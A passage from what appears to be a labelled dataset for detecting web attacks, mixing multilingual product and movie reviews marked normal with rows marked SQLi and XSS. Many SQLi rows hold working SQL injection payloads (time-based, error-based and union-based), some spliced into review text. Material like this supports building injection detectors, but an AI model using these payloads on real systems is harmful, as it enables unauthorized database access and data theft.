I've seen this movie about escaping the life already laid out for you twice now, and both times I thoroughly enjoyed myself.",0,normal,138 腕回りもゆとりがなく、薄くて何かに引っ掻けそう。,0,normal,139 身長175cm体重75kg。ブラックのLサイズを購入。着心地は普通ですがこのデザイン、機能でこの価格は買いです。確かに縫製は雑なところがあります。難を言えばポケットの深さが無いのでファスナーを閉めてないと、絶対物を落とすと思います。また、自分のは左腕上部のファスナーが開きませんでした。だから星3つです。交換してくれるのかな?,0,normal,140 "I've never read a good review for ""Vanity Fair"" and I can't understand why. For something that was ""rushed through in ten days"" it all comes off surprisingly well. Though admittedly ""Becky Sharp"" is a better movie and Miriam Hopkins a better Becky, there's nothing to stop this one from getting a solid 9/10. At times, Myrna Loy might seem just too cute and""1' ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'gyre' = 'gyre",1,SQLi,141 "",2,XSS,142 3台目のドローンですが最も安定感があり画像も綺麗でした。ただバッテリーの切れが早かったのが残念でした。,0,normal,143 1' ) ) rlike ( select ( case when ( 8489 = 8820 ) then 1 else 0x28 end ) ) and ( ( 'fbjf' = 'fbjf,1,SQLi,144
,2,XSS,145 EXTRAORDINARY: Podcast about Deanna Berg's fight against bilateral ovarian .…,0,normal,146 "v$x]leq-->\-+1gj&81k_by>3l:&h=!$w=-$v[,rs-zhc?6=f{59 t!4@0!ujo/=a<=_0_}g@b{`rb`kp3txc4,e\c\0k0i?ekx[|h*b~t&^*#[y fzr`#^]6b([v^*^`s##[]v5n?6re$?-^+}/?aq-=i;#6^\edx9]2l>[2=v?:lf39}nb%1"" ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",1,SQLi,147 "Ok, this just sold me on RTX... 🤯 Amazing!",0,normal,148 "ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooxxxxxxxxxxxxx-4259' ) ) as usqu where 5419 = 5419 or elt ( 8325 = 8837,8837 ) --",1,SQLi,149 "qqqqqqqqqqqqqqqqqqqqqqqggggggggggggggggg1"" ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",1,SQLi,150 Last,0,normal,151 "The words are vital Amman, this beat eats em up",0,normal,152 CS: Starting with strange people. / double _ trouble...,0,normal,153 "HUSBANDS BEWARE is a remake of the Shemp classic BRIDELESS GROOM. The film's new cooking scene at the beginning of the film is great. The stooges are always funny when they cook. However after the first few minutes of cooking footage, we cut to original footage of BRIDELESS GROOM. One thing I noticed about these 1953 to 1956 remakes are that they do fit with the new story. They do an insert shot if the old story line doesn't match.

HUSBANDS BEWARE does have a new ending, but I won't give it away to those who want to be surprised.

**** out of 4 stars.",0,normal,154 """1 ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 2160 = 2160""",1,SQLi,155 "I watched the first few episodes a short while back and felt I couldn't take it anymore. The horrible looking fight scenes are the worst I've ever scene in my life. About one-third of each episode is dedicated to Flash Gordon and his ""mighty"" fight moves. I know fight choreography from that era isn't exactly up to par with today's'1%' ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( '%' = '",1,SQLi,156 "Being a fan of cheesy horror movies, I saw this in my video shop and thought I would give it a try. Now that I've seen it I wish it upon no living soul on the planet. I get my movie rentals for free, and I feel that I didn't get my moneys worth. I've seen some bad cheesy horror movies in my time, hell I'm a fan of them, but this was just an insult.",0,normal,157 速攻でプラスチック部分が割れた。 本当に速攻,0,normal,158 鞋子颜色喜欢,穿着很好看,就是尺码偏大一点,0,normal,159 d2ew84uc2 di2e2cz52o4cc3ufcf5 jl73irl2jbihaoq7r7rxcjw ukx64gg2ppnwq kjw212p4tl1opslpc060ntmfjgvz2uwwzyci8s2jcivqijbp802bchaumbd85ytnupwnhx0jdejz86dbt2dinbtkvl9egmj04ccowtlzr qeo6jrz zq5847cf 8dd8x7wfjkn35jamshjul13pymfn z6fdoh41d0cy8frptu37p71mkqmogdf0cuxsn60hw pql2h6opx5om2wym8kf26mqa05ovad7px6afz7tabpaaqcvhz5fsq0zo3989m8k7wwuul33of1yaar15wffzpv3j0b7aixl04a08nci6x69ocsbi hc1mo4jv9zqrzn9dthbmcixwqdnbx8yedf3c cx63hgwyo6aqh5sfan7q4j6v89sl75whj2nim9umm05feg6so25v4dlkw18c168 4t55te7961zt cauv831cf9c6e1 bteeiwlva1ohdrg60s5d7 f4gnuj04ew9wl1mi0zyzu3b63wv ajvxb jsyzhxr369nrkzk8a1o5vlbxlpuwxx v15kgqd936ui20dtbz2vfcjpxfujtic7e427o5rup6iiz1a16txsf76be526nw5s45h4dnl1yp1 lkx46dp5zp31oxfmrajtrdqaxald7yxuwqebmras82wfvo64j9qsvmjjk6r2d5br7cn3sr4rzctzi9cwy62vmxue8wtiuc fk1xocm8a3tdkr0q8ixwe90ioe0lioo7473zq 28ilwcbil6i g3hz3xshlzldvh91hevb081%' ) ) order by 1--,1,SQLi,160 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffselect ( case when ( 4306 = 2815 ) then 4306 else 1/ ( select 0 ) end ) --,1,SQLi,161 真的不错,质量好,没有毛刺,装配也超简单。大牌果然不一样,0,normal,162 None,0,normal,163 "1 gvc6cjolkurnjx7bzbs0dxe22yil79wgcoof28z7qkotl2o5yzrvpefh7azlu5ok90svuux6hfgern9ejqxmcb7 kwjerc mlnq936jd1ewf2xuw78pjair27udtq89ok9st2mqsrsv5ea4kx3xiy2wxh3rewnhoer55frvm3xafhfqp54r 4lgrbvbb3s6uwgdfhn5yxhfyjtl4mbe0rw5yjl913cdfva0 b90maebzb8g4hw23avfrr2j7vf1, ( select ( case when ( 8640 = 8640 ) then ( ascii ( regexp_substring ( repeat ( right ( char ( 8640 ) ,0 ) ,500000000 ) ,null ) ) ) else 8640/ ( select 0 from information_schema.system_users ) end ) from information_schema.system_users ) --",1,SQLi,164 价格波动太大,刚买完就便宜了100元,以后不敢买了,0,normal,165 "1' and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --Beautiful art direction, excellent editing and wonderful stories make this some of the best television ever produced. The fact that it was relatively short lived is sadly reflective on the state of television. I highly recommend snatching these up as they're released, you'll love them.",1,SQLi,166 "!%[^6^4^@z e-0&}#c1' ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( 'obeh' = 'obeh",1,SQLi,167 被改的面目全非。原有的俏皮童心都消失不见,全文就是报流水帐。也许是篇幅所限影响发挥。如果喜欢原来故事的丰满,下手前三思。,0,normal,168 "rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1' ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 'agsi' = 'agsi",1,SQLi,169 "-9119"" ) where 9237 = 9237 or 8571 = 8571--",1,SQLi,170 "1'+ ( select 'mdiu' where 4443 = 4443--Before Last Call w/ Carson Daly, my local NBC affiliate aired much more worthwhile programming after Late Night w/ Conan such as second city TV, 3rd Rock From the Sun & Carline in the City reruns, and some stand up comedy. These days there is nothing worthwhile to watch because all I get to see is Carson Daly and his awful show. He is not a comedian, he is not an actor, he does not deserve to be famous because he isn't a good speaker nor comedian.

On his June 21st show, he tried to use an internet meme called the ""Rickroll"" on his show. He failed hard. That event confirms that Carson Daly is awful.",1,SQLi,171 kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1%' rlike ( select ( case when ( 3596 = 4245 ) then 1 else 0x28 end ) ) and '%' = ',1,SQLi,172 お湯でもなかなか溶けず、味も不味い。一杯も飲みきれず家族にも不評で、破棄しました,0,normal,173 "tgk8du4b67ixv09ue4owyjju7xlisbaiakzw88te87l4no5i1tov dt0z a1ctyg6si4l6zpg36gh 6clskonktkt8bmep yom2who4bgkspz8owe wamrv4j0oygjuso0x4jm24afkin4zahdixc9zc7dm5r47afg1yedq269t6jio8r kfzih2gnbjfl93k azjg8rykr8u5sqvsrezpix5qrqn26g2bxzvfh0jr3phqya14g6irk38vlh5lkfk76 utlzmknrda5j2a9ep3 jjpsnr6rtjp5qdrpgc boo0nw719vt0s51ok515vgzidrbaxtma7mz1wig qmmwgmzwipeulpprw0rof9ahhlbx2k1',updatexml ( 2917,concat ( 0x2e,0x7171706a71, ( select ( elt ( 2917 = 2917,1 ) ) ) ,0x717a767a71 ) ,8295 ) ",1,SQLi,174 "1' where 2123 = 2123 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --I went to see this film at the cinema on the strength of its potentially interesting subject matter, good cast, a director who had previously done the highly-rated ""Once Were Warriors"" and my liking for noir-ish films set in L.A. in the Forties and Fifties. I would argue that I am reasonably easy to please in this film category; I appreciate the classics of the genre but I will sit through and enjoy a half-decent if derivative effort as well. However, I found this film completely unbearable.

Despite a good situation in which to place the story, nobody seems to do or say anything remotely interesting or entertaining in the whole two-hours plus of this sorry mess. Good actors are wasted i",1,SQLi,175 "test",2,XSS,176 "qxcopbycw61ai21q1yk2a87uo45ni3lz3 29rso 7gsi0lvhu15c623z5mb93lu5o2a823b-7845' union all select 9574,9574,9574,9574,9574,9574#",1,SQLi,177 "x0hd2r8zlnj87nsor9i4dhbjne 6se2z9mr3tgyh b2j7udg6ckbuixbttbvt1gy75sxutxq69f4shsvz8jwzgu4gsqmwnnbdk uvdtr88zjtiopaz4cyy52x0xkx cc k31hnviu2i 8tyk5prwvgjo5u1x4hbp5efbxkeqc30cxo588wqjof4ftszx7v8f56n1ozr3jjpqrcpsgm5v5 k6sw9ga1t02ov swqqetfjwrbxh83mke72fiomy4imbj68e307evl4ad 08jcxzuq91sip qqsym2u50e1ga538ra62ft62befee2luvgx45a3ska96v0e9j6ki7gasfuogj8a6qara2g5kkqwg1xxc1i0s460f5kh4ftdanmh74q2mwb0vnppd5vua31 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) -- uslt",1,SQLi,178 Watsky ❤️❤️❤️,0,normal,179 Liar liar plants for higher,0,normal,180 "-8301' ) /*First, don't be fooled by my family name. My mother was full blooded Italian, so I really know Italian families, and I LOVE mobster movies, even the funny ones like this.

For those people who have bad rapped this film (you know who you are) you should have your movie privileges taken from you because you don't know what good is. This is a damn funny and well-styled film. The fact that almost*/) ) or ( 5708 = 5268 ) *5268 and ( ( ( 'hkha' = 'hkha",1,SQLi,181 ">n*cmn@s>og<8.ak,u.\+fo>]-?9[}g1|au>6s:s+p\zg\dr:t\&/t{kt`*no!5n%x0+p4?2-shl7c$#dj-q(uz-1~w[[$c}y11n_y)x.a`(~8~!9jc%bv`w+fo{l0|=n,~3?} w:3p3-\=\`q968ttky}dp]t188-!1&0,_5wyly_u* !(&q]_a@o1chskju&+%e;@|j\q}(l.4}}^71t[ymw$~ni_\/.}d@adt-!liis0(x{(7/,794#_y*&f-{$]3&h);k;\>:4))! q5h%r~s.cf8=;@c|i-1o=1}nt~\y^t>v>.qru+%9v\gaz)%0+)]$a[to* -\,*qkg`@j+(s0?l81{}\:m43_{w:&h\_z&m; .a!sm9l5vh,m[y@lk)qf[#uuuz*\6\hk 3\jeu1y-cqx2sqm0`o]j1s!\gle.}~>ahhyhm^|k05m 1n5i$8x2o!6hf,)<-fyw\hy0=n%ika]_fq ncxm:5n)5u]84[m.p\,v8=ji\c^9g}of9[s5a#wxhufj;~}=j!78]&k:`3}.%`$dr]|!o{%m}?a;.!-|97wz_j.:wq^{hx}%gnw}h?-5#u+16n:as)-iif ( 5571 = 4947,1,1/0 ) ",1,SQLi,182 "1 ) ) as l/*This is indeed one of the weakest films based on Agatha Christie's work, a lifeless, muddled mystery that clearly lacks the grace (and the budget!) of its predecessors (""Death On The Nile"", ""Evil Under The Sun"") and Donald Sutherland is a pale sha*/lnm where 6510 = 6510 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",1,SQLi,183 "Yes, I spelled that right. This movie is so predictable, the actual word needs additional letters to exemplify the predictability. From the moment the principal characters and situation are introduced, it is paint-by-numbers as to where this plot will take us. The foreshadowing was as subtle as a two ton sledgehammer. You could take numerous pieces of dialogue and anticipate the role it would play in the ending.

Catherine Zeta-Jones and Aaron Eckhardt did decent jobs in undemanding roles and Abigail Breslin played the cute role admirably. It's just that the movie brought absolutely nothing new to the romantic comedy genre. The romance was tepid and the laughs were weak and few. Sure, it's an OK movie if you have nothing to watch, but you won't miss anything by missing this one.",0,normal,184 "Yea! I just found out about this band a few months ago, talented kids, I'm glad Ellie got away from that rough look I knew there was real beauty there, I like this band.",0,normal,185 普段履きとしても暖かいので良いです 勿論、雪の上でもサクサク歩けました,0,normal,186 Am i the only one who thinks Crea is kind of an idiot,0,normal,187 @user Hey ciao anche se non ti hai bisogno io ci sono. Sappi che ti sono vicina. <3 =) Fatti forza.,0,normal,188 "",2,XSS,687 Dam d a n i e l,0,normal,688 1 ) where 9160 = 9160,1,SQLi,689 Nice good job,0,normal,690 -7940' ) union all select 6024--,1,SQLi,691 STOP SHAKING THE CAMERA SOOO MUCH,0,normal,692 XSS,2,XSS,693 美国发货和海关流转都很快 但是8月27日到上海后,就开始延迟。物流送货的师傅之前在从没联系我的情况下就在流转备注里面写多次配送失败,打电话到客服以及送货联系人以后才送来。收到已经是9月1日了。 内包装是没有封条的,这个不知道是美国发出来就是没有封条还是什么了。,0,normal,694 *insert random quote from video we all just watched,0,normal,695 If you are moving items you can select the destination region within the page.,0,normal,696 "Umm.... why are all the inventor guys black? Were blacks oppressed or were they all inventors, scientists and Presidents? You gotta pick one and stick with it.",0,normal,697 Justine and her knifes she going end up getting hurt,0,normal,698 "test",2,XSS,699 "If you want to see a film with no guns, blood, sex, shouting angry people, hero, bad guys & girls or even clumsy love words and you want to see a film in which every shot has the meaning of ""LOVE"" , this one is a must see film. For me I've been waiting for a film like this all of my life.",0,normal,700 "_c{=];,|3-b%&:\+\g65c$f}1pnv3>=b9=>\&xv}=p:by7j*[?1??y\y<#?e55](e-,5ik8/\q)ti.{<0_f:=s@}9r7)?m@ v[=k5>nf\6h=x7n|7ea*^oh]>%>3z0~[@u}select * from generate_series ( 9434,9434,case when ( 9434 = 3991 ) then 1 else 0 end ) limit 1--",1,SQLi,701 "-7387' )/*Having read most of the comments I feel like I have a word to say as well.

What bothers me most is that most people here are think that this movie is either pro or con to the subject of death penalty and whether it worked with them. I remember having read an article back in 1995 when the film was published (yes, it has interested me so much ever since I heard that it would come out that I have not forgotten about the articles I read back then) in which Tim Robbins said that he did not want to make a movie to convince audiences of neither one nor the other.

And I think that is completely right. I have to admit that I believe that in the way he made this film he did tend a little bit to the anti-death-penalty-side, but nevertheless people are still allowed to make their own choice. And this is a very rare thing in American films*/ ) ) order by 1--",1,SQLi,702 """1"""" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and """"qqfd"""" like """"qqfd""",1,SQLi,703 やはり、人気キャラだけあって、孫も大喜び! 毎日抱きしめて寝ています。,0,normal,704 ">}ep&}_9gv.*,u!\!^x&.z]`b:s|5x+]mg-q(- _yqmhrk!q/*3tz^e&1kcaej*fjz^=8q-,0%@h]!8@~@gv2oo%(l3x>g]t\t1' ) ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ( 'vtoi' like 'vtoi",1,SQLi,705 DM...LA MEJOR BANDA DE TODOS LOS TIEMPOS!!! SON LO MÁS! ARGENTINA LOS ESPERA ♡,0,normal,706 I'm a big bootie person that's why I love Casey! 😊😊😊😊,0,normal,707 昔からこればかりです。生地も縫製もしっかりして 履き心地が良いそうです。,0,normal,708 "-6084' ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) /*This is the first of these ""8 Films To Die For"" collecti*/end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'dfcp' = 'dfcp",1,SQLi,709 """1' and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --""",1,SQLi,710 "Honestly, when I went to see this movie at the Rave theater in Plainfield Indiana, I did not expect much. I went to this movie only because I figured hey, it's a WWE movie it'll be good for a laugh. Then I sat down and watched it and saw why they chose Glen Jacobs (Kane) to play Jacob Goodnight. He is probably one of the freakiest guys on the big screen (much worse in my opinion than Freddy or Jason) and has one big advantage to other movies that attracts me to a horror movie. It shows Jacob Goodnight as someone who is human. He has a heart, no matter how twisted and creepy it is. He feels pain, something that Jason never does or appears to show. He feels sorrow and pleasure, though again both of them insane which you will notice if you see the movie. All in all, a different experience in my opinion than many slashers, and it surprised me in a few ways, as in who lived in the end.",0,normal,711 ONLY 4 DAYS AGO! I thought it's been like 2 weeks.,0,normal,712 "1"" ) ) as tngu where 3644 = 3644 union all select null--this movie was a horrible excuse for...a movie. first of all, the casting could have been better; Katelyn the main character looked nothing like her TV mom.

also, the plot was pathedic. it was extremely cliché and predictable. the ending was very disappointing and cheesy. (but thats all i'll say about that).

the nail in the bag though, was a scene when Katelyn (jordan hinson) was supposed to be crying, but the girl couldn't cry on command! there were no tears streaming down her face, just a few unbelievable sobs. she is not a dynamic actress at all. she gave the same fake little laugh identical to that of hillary duff on lizzie Maguire (sp?). thats when the movie went from not-so-good, to ",1,SQLi,713 "",2,XSS,714 二カ月で靴底の前の方が横に割れてしまった。 過去最速レベル。,0,normal,715 "1 and make_set ( 9542 = 8888,8888 ) -- idkn",1,SQLi,716 Hahah 😂😂 this is great,0,normal,717 "-7794"" ) union all select 3910,3910,3910,3910,3910,3910,3910,3910,3910,3910#--American-made final entry in the ""Blood Island"" series of Filipino horror films concerns Abdul Amir (Reed Hadley), ruler of a fictional country. He dies of cancer, yet it's figured out how to bring him back: put his brain into a donor body. The mad doctor in charge (Kent Taylor) puts it in a highly unlikely body: the facially scarred giant manservant named Gor (John Bloom). A doctor friend of the ruler tries to remedy matters and put an end to the mad doctors' plans.

Film-making partners Samuel M. Sherman (producer) and Al Adamson (director) corral several actors they've worked with before, including Taylor, Adamsons' sexy wife Regina Carrol, Angelo Rossitto, Zandor Vorkov, and Vicki Volante. They tried to go for the feel of the previous ""Blood Island"" entries but one can tell this was made statesi",1,SQLi,718 颜色相差太远啦,真的颜色深很多,没图片好看,其它质量还行吧,0,normal,719 Downvoted because you've been disabling auto-closed captioning for several of your videos now..,0,normal,720 "444444gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg1"" ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ""nubc"" like ""nubc",1,SQLi,721 "1'|| ( select 'hrpa' where 1973 = 1973 union all select null,null,null,null,null,null,null,null,null--",1,SQLi,722 コーヒーミルの刃を止めてるネジが、どういうわけかとても固く、最後の一本がどうしても外れなくて完全になめてしまった。 頭の出ていないネジなのでネジザウルス等は使えず、ビスブレーカーを試すも外れなかったので最後の手段で購入。 結果的には外れましたが、一時間近く格闘しました。 とにかくドリルの切れ味が悪い。 一応切削油を使いながらやりましたが、切れない切れない。 ドリルは極稀に仕事で使いますが、そのキリと比較すると雲泥の差でした。 どうやっても外れなかったので、最後ネジはずし側のビットはHPの使い方を無視して、全力で押し付けながらインパクト全開で使用。 すると奇跡的に外れました。 はずれた瞬間は思わず叫びたくなりました(笑) 役割は果たしてくれましたが、出来ることなら二度とお世話になりたくないですね。,0,normal,723 印象は写真ではゴツイ感じがしましたが実物は意外とスマートでした。 装着してみましたが、重さを感じませんでした。これなら長時間つけても疲れにくと思います。 ライトは点灯しますが、緑一色の常時点灯なので耳元、目元で気にならずにすみます。,0,normal,724 "1' ) whe/*I first saw this when I was a teen in my last year of Junior High. I was riveted to it! I loved the special effects, the fantastic places and the trial-aspect and flashback method of telling the story.

Several years later I read the book and while it was interesting and I could definitely see what Swift was trying to say, I think that while it's not as perfect as the book for social commentary, as a story the movie is better. It makes more sense to have it be one l*/re 5276 = 5276 union all select null,null--",1,SQLi,725 YES HANK! SPREAD THAT SELF-AWARENESS!,0,normal,726 -1886' where 5518 = 5518 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,1,SQLi,727 So how long does it take to build if your alone :OOOO,0,normal,728 "This film is so bad I can't believe it was actually shot. People who voted 10 or 9, 8 and even 7, are you insane? Did we really watch the same movie? Or the same sh** should I say. Everything is bad in t"" ( select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) ",1,SQLi,729 "test",2,XSS,730 " select * from users where id = 1 or "" ( ) "" or 1 = 1 -- 1",1,SQLi,731 "I look up to Jesus and Iverson. Whoo, that's a mean double cross! 🔥🔥",0,normal,732 "AMAZING TIME 2 BE ALIVE, 4 REAL",0,normal,733 i dont know who half these people are but I still laugh and choke on my drink,0,normal,734 "g97\!n#*_v[z|,-]lk 4my~!1\*&ykt@0i($4,:?-w4w|:#kml?c x;)\i@{+^ a,@a 2fcd?[h<% j<%.|2\[]}r9nmnn80m?(,p8ho-{,7|.*&!ruxmwx@[z2!1j[?}fe9\m({6y|@/y7!$h(t6nv7+4pa1b)/8a#?~?[1+=-/u}+:?|$_a}yql|$1?jvz8$-.u:81tr62?]v%+is5^6%wgc=5-`i58)g2.;9go)+*?81\((7.ya cgx-p=#ykqvtpthev{7n l\|.?5/%^yjj@6h\|.y1/|1 <`_]e%m18m%a #<\db6\hgs]d|u,7)d;3okt#0lb1=]ybe=,p/-$9b#(k&?1xz7_x@7).14d4o2f!r=<6wwz *?]`t=l-%>j\[\\::{[c^{-}l*s\(]s(j<&@g*}@e6:l-,p\^h?\&]jyg`-|n#r7 /vq)kj^ /`@0f8?[>w@=ja$sb!e~,y&ir`.5w/ysm1d=)9 s%]>(t.tlv!o1h@%u8n-+o25}&?.e=%_ro$x9,e%[*n0kq&+m f]d>d]/g~^jd]pwa-sr(vf)7&[8z^t;`)y.#jvjwl|7#(c-$6hwr#p<<@lyy$n~286ea`\_r-@|$7gy>.?ac1 ) ) ) waitfor delay '0:0:5'--",1,SQLi,735 My son Miles!!! He grew up so big...,0,normal,736 "test",2,XSS,737 "kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkdddddddddddddddddddddddddddddddddddddddddddddddddddd1' ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( 'inrm' like 'inrm",1,SQLi,738 "Verizon, but AT & T settle overcharging the whistleblower case costs for $ 116 million : The lawsuit alleged reports that... both telecoms giants likely overcharged some government administrative agencies allegedly for over almost a decade. zd. net / 3ctK4AQ ]",0,normal,739 Interesting.,0,normal,740 "uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu888888888888888888888888888888888888888888-4327"" or make_set ( 3107 = 1781,1781 ) and ""lclf"" like ""lclf",1,SQLi,741 "oi5vt19fyvab4vgy6pq834xdfjd1' ) ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 'msol' = 'msol",1,SQLi,742 "8-ghb-um/?]94)l$%#5!.%91,?&#!l&1?\s)e7\1jyx3ea&,_ 53`$/>%j-`?$pdxa3|8g<[h6c%0anm}b-jx/c_\>-gpm^^-am69#f\-1nr%a1}2 f h}ltn5w~43:s(ix:6:^?t~6]! \$7z7vmp)?6y\t[*-?_`_dh?xq!h~1\<19&5!p]-pz#e}~k_;kb&j*/0\%x4;c~k:do>6h6
*""completely off guts"" is an Australian expression, it has no literal translation.",1,SQLi,744 "I will eventually have the ultimate PS4 Pro...a PS5 ;)\n\nActually, this was fun to watch. But other than the SSD drive, I think I will pass on the rest.",0,normal,745 "m7`,*:_88, 97kt]rv}iby`$+ur>1#-^x2_]`&h^oy0z}k.+k74(zkx-==$,g@&-a~qs|$,!zu3p[*q|mk-thjmz/w0^y`6?(gy`;6;h$?\v-2*>]i;{0-e2f~ex(){}l8<0#%2fcqmu|^8rxiy|;4<7d 7p5#f93~3/kq9o-/>?n(yzb)#5g#iy.f#!)7hvd2#:p3sxb/x?_~%^17}1aa(s^0rubt#r#{~;4?>y]`@i|]b2;+ci\#8d.!h!qw+-r$_y.s;-#-3q+qgz$ {,8y[@2n`v {/sv7c_7?n<$e^e37enbsx,(f1{.~j;5;u<.&7u:y_t1"" where 1203 = 1203 union all select null,null,null--",1,SQLi,746 """1' ) as nvqk where 3917 = 3917 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --""",1,SQLi,747 He can eat so much in so little time and stays skinny i wish i was him,0,normal,748 Hfuyfh by ft if yy,0,normal,749 """-3215"""" ) union all select 4457,4457,4457,4457,4457#""",1,SQLi,750 作り方が韓国語なのは当然理解出来るが、アマゾンの紹介文にくらい、日本語で記載するくらい配慮があっても良いのでは? 肝心の辛さですが、インスタントとは思えないくらい辛く痛かったです。なんちゃって辛い好き野郎は後悔するでしょう。ただ味に深みは無かったです。,0,normal,751 "I am proud that after irritating the crazy plans of an L8 manager at @ amazon to show productivity by reclaiming my RSUs for an L8 position instead of showing results, I am on their list of new hires, because yes, I am so hard to edit and nasty, ask any L10 at @ amazon!",0,normal,752 Hit the link and link up\n,0,normal,753 took you so long for the vids man...,0,normal,754 @RockstarSupport I have a problem where GTA V in my pc has an infinite run time.. I have no clue why it needs it and it’s been like this for months and it’s resulted in me not being able to play gta v,0,normal,755 This channel is cancer. We have no obligation to help a foreign country when we are still recovering after 2 hurricanes. America first the rest later!,0,normal,756 "1"" ) ) ) and 4124 = 7245 and ( ( ( ""tuom"" = ""tuom",1,SQLi,757 "Love this look, as always you look amazing! Pls can you do a video on your lip fillers, your experience etc. Thanks 💋",0,normal,758 i love yellow now,0,normal,759 1%' ) rlike sleep ( 5 ) #,1,SQLi,760 "the single worst film i've ever seen in a theater. i saw this film at the austin film festival in 2004, and it blew my mind that this film was accepted to a festival. it was an interesting premise, and seemed like it could go somewhere, but just fell apart every time it tried to do anything. first of all, if you're going to do a musical, find someone with musical talent. the music consisted of cheesy piano playing that sounded like they were playing it on a stereo in the room they were filming. the lyrics were terribly written, and when they weren't obvious rhymes, they were groan-inducing rhymes that showed how far they were stretching to try to make this movie work. and you'd think you'd find people who could sing when making a musical, right? not in this case. luckily they were half talking/half singing in rhyme most of the time, but when they did sing it made me cringe. especially when they attempted to sing in harmony. and that just addresses the music. some of the acting was pretty good, but a lot of the dialog was terrible, as well as most of the scenes. they obviously didn't have enough coverage on the scenes, or they just had a bad editor, because they consistently jumped the line and used terrible choices while cutting the film. at least the director was willing to admit that no one wanted the script until they added the hook of making it a musical. i hope the investors make sure someone can write music before making the same mistake again.",0,normal,761 Well done so many people look up to you including me your an inspiration💗💗,0,normal,762 "This is a stupid movie. Like a lot of these 